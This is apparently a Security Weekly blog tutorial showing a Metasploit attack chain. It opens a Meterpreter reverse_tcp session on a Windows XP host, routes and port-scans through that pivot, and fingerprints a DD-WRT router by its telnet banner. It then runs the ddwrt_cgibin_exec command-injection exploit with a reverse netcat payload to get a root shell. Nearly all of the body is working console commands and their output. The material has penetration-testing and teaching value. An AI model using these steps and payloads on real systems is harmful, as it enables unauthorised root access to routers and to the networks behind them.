Security Weekly
Malware

Using Metasploit DD-WRT Exploit Module Thru Pivot

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the  HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. It was argued that this exploit is of low impact by some since the distribution only listens for HTTP connections thru the internal interface. In this example of using the exploit the exploit will be used thru a pivot obtained thru a client side exploit from which we will pivot, do a discovery, finger print the device and exploit it.  In the following example we will start by showing our IP of the attacker machine, receiving the Meterpreter shell and showing the target box IP thru a cmd shell:

msf > ifconfig eth0


[*] exec: ifconfig eth0




eth0      Link encap:Ethernet  HWaddr 00:0e:7f:f9:12:62  


          inet addr:192.168.1.158  Bcast:192.168.1.255  Mask:255.255.255.0


          inet6 addr: fe80::20e:7fff:fef9:1262/64 Scope:Link


          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1


          RX packets:55461 errors:0 dropped:0 overruns:0 frame:0


          TX packets:23899 errors:0 dropped:0 overruns:0 carrier:0


          collisions:0 txqueuelen:1000 


          RX bytes:58889891 (58.8 MB)  TX bytes:3107063 (3.1 MB)


          Interrupt:20 




msf > use exploit/multi/handler


msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 


PAYLOAD => windows/meterpreter/reverse_tcp


msf exploit(handler) > set LHOST 192.168.1.158


LHOST => 192.168.1.158


msf exploit(handler) > set ExitOnSession false


ExitOnSession => false


msf exploit(handler) > exploit -j -z


[*] Exploit running as background job.


msf exploit(handler) > 


[*] Handler binding to LHOST 0.0.0.0


[*] Started reverse handler


[*] Starting the payload handler...


[*] Transmitting intermediate stager for over-sized stage...(216 bytes)


[*] Sending stage (718336 bytes)


[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.100:1085)




msf exploit(handler) > session -i 1


[-] Unknown command: session.


msf exploit(handler) > sessions -i 1


[*] Starting interaction with 1...




meterpreter > sysinfo 


Computer: AWINXP01


OS      : Windows XP (Build 2600, Service Pack 2).


meterpreter > execute -H -f -c -i -f cmd.exe


Process 1708 created.


Channel 1 created.


Microsoft Windows XP [Version 5.1.2600]


(C) Copyright 1985-2001 Microsoft Corp.




C:Documents and SettingsadministratorDesktop>ipconfig


ipconfig




Windows IP Configuration






Ethernet adapter Local Area Connection:




        Connection-specific DNS Suffix  . : 


        IP Address. . . . . . . . . . . . : 192.168.111.200


        Subnet Mask . . . . . . . . . . . : 255.255.255.0


        Default Gateway . . . . . . . . . : 192.168.111.2




C:Documents and SettingsadministratorDesktop>exit


meterpreter > 


Know we proceed to background this session and set a route thru the session to the network behind the NAT router from the information we gathered:


meterpreter > 


Background session 1? [y/N]  


msf exploit(handler) > 


msf exploit(handler) > route add 192.168.111.0 255.255.255.0 1


msf exploit(handler) > route print




Active Routing Table


====================




   Subnet             Netmask            Gateway    


   ------             -------            -------    


   192.168.111.0      255.255.255.0      Session 1  




msf exploit(handler) > 


Now that the route is created we can use the TCP Port Scanner Auxiliary Module to do a TCP scan of the default gateway of the target network:


msf exploit(handler) > use auxiliary/scanner/portscan/tcp 


msf auxiliary(tcp) > info




       Name: TCP Port Scanner


    Version: 6823


    License: Metasploit Framework License (BSD)




Provided by:


  hdm <[email protected]>


  kris katterjohn <[email protected]>




Basic options:


  Name     Current Setting  Required  Description                                  


  ----     ---------------  --------  -----------                                  


  PORTS    1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)        


  RHOSTS                    yes       The target address range or CIDR identifier  


  THREADS  1                yes       The number of concurrent threads             


  TIMEOUT  1000             yes       The socket connect timeout in milliseconds   




Description:


  Enumerate open TCP services




msf auxiliary(tcp) > set PORTS 22,23,80,443


PORTS => 22,23,80,443


msf auxiliary(tcp) > set RHOSTS 192.168.111.2


RHOSTS => 192.168.111.2


msf auxiliary(tcp) > run




[*]  TCP OPEN 192.168.111.2:22


[*]  TCP OPEN 192.168.111.2:23


[*]  TCP OPEN 192.168.111.2:80


[*] Auxiliary module execution completed




msf exploit(handler) >


Since we are going thru a Meterpreter TCP pivot is important to remember to keep the THREAD variable to 1 since Meterpreter is not multithreaded and limit the number of ports to those you want to target so as to not expend a large amount of time scanning. Now that the ports that are open we proceed to finger print one of the services by getting the banner using the connect command in Metasploit:


msf exploit(handler) > connect -c 1 192.168.111.2 23


[*] Connected to 192.168.111.2:23




DD-WRT v24 std (c) 2007 NewMedia-NET GmbH


Release: 01/26/07 (SVN revision: 5660M)


�


DD-WRTx86CI login: ^C
msf exploit(handler) > 


msf exploit(handler) > 


 


As we can see the Telnet login banner identifies the target machine as a DD-WRT box. We know proceed to load the exploit module and set a reverse netcat payload and set the other appropriate variables. Onece we have ran the exploit and a session is created we proceed to run the Linux uname command to check the version of the device and to also check the shell is working:


msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec 


msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat 


PAYLOAD => cmd/unix/reverse_netcat


msf exploit(ddwrt_cgibin_exec) > set LPORT 2222


LPORT => 2222


msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.111.2


RHOST => 192.168.111.2


msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.158


LHOST => 192.168.1.158


msf exploit(ddwrt_cgibin_exec) > exploit




[*] Handler binding to LHOST 0.0.0.0


[*] Started reverse handler


[*] Sending GET request with encoded command line...


[*] Command shell session 2 opened (192.168.1.158:2222 -> 192.168.1.100:4531)






uname -a


Linux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown


One advantage is that since the shell is running thru a Meterpreter session all traffic outside of the target network to the attackers box is encrypted using SSL. 


For more information on this vulnerability please check the following links:


http://www.securityfocus.com/bid/35742


http://www.milw0rm.com/exploits/9209




    



	    
	
Carlos Perez
Carlos is currently the Principal Consultant, Team Lead for Research at TrustedSec and well-known for his research on both Metasploit and Windows Powershell. His blog www.darkoperator.com carries the tag line: “Shell Is Only The Beginning”.


Related
DDoS attacks spike in first quarter
Fifty percent more distributed denial-of-service attacks have been launched by threat actors during the first quarter of 2024 over the same period last year, with thwarted DDoS attacks increasing by 93% year-over-year, SiliconAngle reports.


Related Events
 
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.